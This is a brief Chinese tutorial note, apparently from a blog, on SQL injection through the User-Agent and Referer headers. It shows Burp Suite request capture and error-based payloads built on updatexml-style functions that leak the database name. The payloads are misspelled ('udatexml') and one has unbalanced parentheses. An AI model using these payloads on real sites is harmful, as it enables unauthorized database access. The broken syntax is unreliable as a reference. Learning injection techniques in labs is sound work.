post 报头注入
1、user-agent 注入:
使用情况:万能密码无法绕过安全验证,用户名无法注入,通过查看源代码分析执行的动作。
bp抓包修改user_agent的数据如下
User-Agent: ' or udatexml(1,concat('#',(select database(),0),'','')#
2、referer 注入:
用bp抓包,修改referer的数据:
Referer:' or udatexml(1,concat('#',(select database()),0),'','')#
浙公网安备 33010602011771号